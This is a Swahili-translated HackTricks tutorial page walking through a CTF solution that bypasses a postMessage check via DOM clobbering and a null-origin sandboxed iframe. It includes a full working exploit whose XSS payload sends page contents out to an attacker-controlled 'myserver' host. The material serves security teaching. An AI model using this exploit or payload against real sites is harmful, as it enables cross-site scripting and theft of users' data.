Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Bypassing SOP with Iframes - 2

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Iframes katika SOP-2

Katika ufumbuzi kwa hii changamoto, @Strellic_ anapendekeza njia sawa na sehemu iliyotangulia. Hebu tuangalie.

Katika changamoto hii, mshambuliaji anahitaji kuvuka hii:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Ikiwa atafanya hivyo, anaweza kutuma postmessage na maudhui ya HTML ambayo yataandikwa kwenye ukurasa na innerHTML bila kusafishwa (XSS).

Njia ya kuzunguka uchunguzi wa kwanza ni kwa kufanya window.calc.contentWindow kuwa undefined na e.source kuwa null:

  • window.calc.contentWindow ni kimsingi document.getElementById("calc"). Unaweza kuchafua document.getElementById na <img name=getElementById /> (kumbuka kuwa API ya Sanitizer -hapa- haijasanidiwa kulinda dhidi ya mashambulizi ya kuchafua DOM katika hali yake ya msingi).

  • Kwa hivyo, unaweza kuchafua document.getElementById("calc") na <img name=getElementById /><div id=calc></div>. Kisha, window.calc itakuwa undefined.

  • Sasa, tunahitaji e.source iwe undefined au null (kwa sababu == hutumiwa badala ya ===, null == undefined ni True). Kupata hii ni "rahisi". Ikiwa unajenga iframe na kutuma postMessage kutoka kwake na mara moja iondoe iframe, e.origin itakuwa null. Angalia nambari ifuatayo

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

Ili kudukua uchunguzi wa pili kuhusu ishara, tuma token na thamani ya null na ufanye thamani ya window.token kuwa undefined:

  • Kutuma token katika postMessage na thamani ya null ni rahisi.

  • window.token inaita kazi getCookie ambayo hutumia document.cookie. Tafadhali kumbuka kuwa ufikiaji wowote wa document.cookie katika kurasa za asili za null husababisha kosa. Hii itafanya window.token kuwa na thamani ya undefined.

Suluhisho la mwisho na @terjanq ni ifuatayo:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
PreviousBypassing SOP with Iframes - 1NextSteal postmessage modifying iframe location

Last updated